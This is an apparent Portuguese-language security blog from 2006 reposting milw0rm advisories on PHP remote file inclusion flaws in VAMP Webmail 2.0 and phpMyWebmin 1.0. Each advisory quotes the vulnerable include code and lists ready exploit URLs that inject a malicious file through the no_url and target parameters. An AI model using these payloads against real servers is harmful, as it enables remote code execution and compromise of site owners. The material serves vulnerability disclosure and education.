sábado, setembro 30, 2006

VAMP Webmail 2.0 - Inclusão de Arquivo Remoto

Falha: Uma má verificação na variável $no_url do arquivo /setup/yesno.phtml permitem a inclusão de um arquivo arbitrário por usuário mal-intencionado.
Script: VAMP Webmail 2.0 e anteriores
Download: não disponível
Código vulnerável (/setup/yesno.phtml):
include $yes_url;
} else {
include $no_url;
}?>
Desoberta por: Drago84
Exploit:
http://host/setup/yesno.phtml?no_url=arquivomaligno?
Papers relacionados: Inclusão de Arquivo Remoto.txt
Fonte: milw0rm.com

phpMyWebmin 1.0 - Inclusão de Arquivo Remoto

Falha: Uma má verificação na variável $target dos arquivos change_preferences2.php, create_file.php, upload_local.php e upload_multi.php permitem a inclusão de um arquivo arbitrário por usuário mal-intencionado.
Script: phpMyWebmin 1.0 e anteriores
Download: josh.ch
Código vulnerável (nos arquivos citados):
include("$target/$folder/preferences.php");
Desoberta por: XORON
Exploit:
http://host/change_preferences2.php?target=arquivomaligno?
http://host/create_file.php?target=arquivomaligno?
http://host/upload_local.php?target=arquivomaligno?
http://host/upload_multi.php?target=arquivomaligno?
Papers relacionados: Inclusão de Arquivo Remoto.txt
Fonte: milw0rm.com

quinta-feira, setembro 28, 2006

[Paper] Inclusão de Arquivo Remoto no PHP

Novo paper no .hack-attack. O texto trata da vulnerabilidade na inclusão de arquivo remoto mal verificado do PHP, mais popularmente conhecido como PHP Injection. A leitura é interessante pra quem gosta de entender uma falha, e não somente explorar ela de forma decorada (como muita gente faz com o PHP Injection).

Interessados em baixar podem visitar nossa seção de papers ou baixar o arquivo diretamente por aqui.

stay root,
loading...

quarta-feira, setembro 27, 2006

Hello World!

Hack-Attack. Vulnerabilidades divulgadas e explicadas todos os dias. E o melhor de tudo, em português.

Referência (essa lista poderá ser ampliada):
milw0rm.com
securityfocus.com

stay root,
loading...